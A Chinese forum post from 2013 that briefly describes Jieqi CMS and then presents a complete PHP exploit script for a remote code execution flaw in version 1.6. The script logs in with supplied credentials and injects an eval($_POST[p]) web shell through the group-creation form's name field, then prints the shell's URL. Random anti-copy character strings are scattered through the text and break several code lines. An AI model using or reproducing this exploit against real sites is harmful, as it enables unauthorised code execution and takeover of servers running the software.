杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。
; {0 |9 B" F# n' o5 _6 k% z: J( r0 M" L. p- W* L
4 H/ |4 }5 m& s9 ?
该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。2 k E* h& L4 }! Y" I T8 [
需要有一个能创建圈子的用户。
8 [# K' Z$ _; u, x
# Q# r/ Q4 L0 H+ Z0 A<?php- ]6 S: j, \+ J9 ?2 z) c
+ }& e# T. z" m9 C1 A) X
print_r('! \" f$ I) {3 ~. j; q" c: @
+---------------------------------------------------------------------------+
* z% j8 ]$ r% j" |5 I; Z" D, rJieqi CMS V1.6 PHP Code Injection Exploit+ Z) E# _6 `- v1 q [" |4 {
by flyh4t
6 B O9 d0 j2 k: F+ hmail: phpsec at hotmail dot com
8 D- b: y* y4 U& V3 lteam: http://www.wolvez.org
: i0 x- F/ b7 n8 [- H# c- n+---------------------------------------------------------------------------+/ r: `/ X# p) b
'); /**
, d- i& P. |+ |* o * works regardless of php.ini settings( s/ L X7 ?1 j
*/ if ($argc < 5) { print_r('
I2 `/ d4 Q0 N1 d h/ I+---------------------------------------------------------------------------+
' E. Q6 r d$ QUsage: php '.$argv[0].' host path username3 d$ h( a: K- A8 V! ~
host: target server (ip/hostname)0 j, Q) ]* t3 t6 j
path: path to jieqicms
0 @3 c3 f- H) k+ }4 y; F" ]uasename: a username who can create group
. X/ q. a7 D d2 s+ tExample:2 e( o1 W" l/ v# F z
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password
. v9 {7 J' @" Y. ?+---------------------------------------------------------------------------+
6 j7 @: l7 b! C) G( f'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961, \8 q/ o/ ]$ E- P, V* m
Content-Disposition: form-data; name="gname"
/ b6 V& R( @! I6 ^1 k* h3 C- B
% i @ _6 s" @: a) x. x3 o'; $params .="';"; $params .='eval($_POST[p]);//flyh4t3 l: H2 W, d* Z' @( ~( ]* N
-----------------------------23281168279961' v% A) ]7 H2 M) \& Q
Content-Disposition: form-data; name="gcatid"* g3 I Y) s! X6 v: X3 e9 S
6 r$ m$ o+ N! \" h. k2 a( I2 v0 t
1
3 L+ A5 M8 t$ b. G D-----------------------------23281168279961
$ i- S2 y) r' Z' Y/ m4 t+ DContent-Disposition: form-data; name="gaudit". ?9 `9 z" K) ?! a. S8 K' v
5 w* N# Y; _+ B8 q4 p) M
10 V. j6 k& ?- W U+ J6 f! y
-----------------------------23281168279961- v7 Q; U9 E; x4 N
Content-Disposition: form-data; name="gbrief"
* _; g7 L& E9 n 1 g) E: p6 V* Z' v! d% ^
1! j) b8 l9 {1 s( g5 X0 G O' w
-----------------------------23281168279961--
' O& A) V: R, G+ ]# A3 I3 |, j'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com8 r0 o7 O2 \2 q4 ^0 q8 T
" G2 b# d0 C2 j) Q/ E
preg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |
发表于 2013-2-23 11:28:09
收藏
支持
反对